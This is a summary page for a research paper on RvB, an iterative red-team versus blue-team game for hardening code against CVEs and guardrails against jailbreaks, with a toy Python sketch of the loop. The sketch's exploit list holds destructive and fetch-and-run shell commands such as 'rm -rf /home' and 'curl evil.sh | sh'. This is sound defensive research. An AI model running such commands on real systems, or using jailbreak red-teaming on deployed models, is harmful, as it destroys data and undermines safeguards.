RvB: Automating AI System Hardening via Iterative Red-Blue Games

Authors: Lige Huang, Zicheng Liu, Jie Zhang, Lewen Yan, Dongrui Liu, Jing Shao

Published: 2026-01-27

arXiv ID: 2601.19726v1

Added to Library: 2026-01-28 04:00 UTC

Red Teaming

📄 Abstract

The dual offensive and defensive utility of Large Language Models (LLMs) highlights a critical gap in AI security: the lack of unified frameworks for dynamic, iterative adversarial adaptation and hardening. To bridge this gap, we propose the Red Team vs. Blue Team (RvB) framework, formulated as a training-free, sequential, imperfect-information game. In this process, the Red Team exposes vulnerabilities, driving the Blue Team to learn effective solutions without parameter updates. We validate our framework across two challenging domains: dynamic code hardening against CVEs and guardrail optimization against jailbreaks. Our empirical results show that this interaction compels the Blue Team to learn fundamental defensive principles, leading to robust remediations that are not merely overfitted to specific exploits. RvB achieves Defense Success Rates of 90% and 45% across the respective tasks while maintaining near-0% False Positive Rates, significantly surpassing baselines. This work establishes the iterative adversarial interaction framework as a practical paradigm that automates the continuous hardening of AI systems.

🔍 Key Points

  • Introduction of the Red Team vs. Blue Team (RvB) framework that automates the hardening of AI systems through iterative adversarial interactions, eliminating the need for parameter updates.
  • Empirical results demonstrate high Defense Success Rates (90% for code hardening, 45% for guardrail optimization) while maintaining low False Positive Rates, improving defense efficiency in dynamic adversarial settings.
  • Formalizing the security process as a sequential, imperfect-information game provides a structured method to dynamically adapt defenses based on real-time exploits identified by the Red Team.
  • Experimental validation across two distinct domains (cybersecurity and content security) showcases the framework's versatility and effectiveness in enhancing the robustness of AI systems against various attacks.
  • Results indicate that iterative adversarial interactions not only improve specific defenses but also promote generalizable security principles, enhancing resilience against novel, unseen attack strategies.
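The iterative loop the key points describe — Red Team finds an exploit that bypasses the current defense, Blue Team distills a remediation from it without any parameter updates, repeat until no known exploit succeeds — can be illustrated with a minimal toy sketch. Everything below is hypothetical: the paper's actual framework uses LLM agents for both roles, whereas this stand-in uses a hard-coded exploit pool and simple substring rules purely to show the game's control flow.

```python
# Toy sketch of an iterative red-blue hardening loop (hypothetical;
# the real RvB framework uses LLM agents for both roles).

def red_team(defense_rules, exploit_pool):
    """Return the first exploit the current defense fails to block."""
    for exploit in exploit_pool:
        if not any(rule in exploit for rule in defense_rules):
            return exploit
    return None  # no remaining exploit bypasses the defense

def blue_team(defense_rules, exploit):
    """Harden the defense with a rule distilled from the exploit.
    Here: block the exploit's leading token, a stand-in for an
    LLM-generated remediation (note: no parameter updates)."""
    token = exploit.split()[0]
    return defense_rules | {token}

def rvb_game(exploit_pool, max_rounds=10):
    """Play the sequential game until the defense holds or rounds run out."""
    rules = set()
    for _ in range(max_rounds):
        exploit = red_team(rules, exploit_pool)
        if exploit is None:
            break  # defense blocks every known exploit
        rules = blue_team(rules, exploit)
    return rules

pool = ["rm -rf /tmp", "rm -rf /home", "curl evil.sh | sh"]
rules = rvb_game(pool)
# After convergence, every exploit in the pool is covered by some rule.
print(all(any(r in e for r in rules) for e in pool))  # True
```

Note how one Blue Team remediation (blocking `rm`) generalizes to a second, unseen exploit in the pool — a toy analogue of the paper's claim that the interaction yields defenses not overfitted to specific exploits.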

💡 Why This Paper Matters

The proposed RvB framework represents a significant advancement in the field of AI security by bridging the gap between offensive and defensive methodologies. It offers a novel game-theoretic approach to continuously adapt and harden AI systems against emerging threats without requiring manual adjustments or extensive retraining. This makes it an essential contribution to enhancing the security posture of AI systems in a rapidly evolving landscape.

🎯 Why It's Interesting for AI Security Researchers

This paper is particularly relevant to AI security researchers because it addresses the critical need for dynamic, adaptive security frameworks capable of responding to the inherent vulnerabilities of AI systems. Its use of iterative adversarial interactions provides a robust mechanism for building resilience against complex attacks, making it a valuable reference for the development and implementation of security methods in AI applications.

📚 Read the Full Paper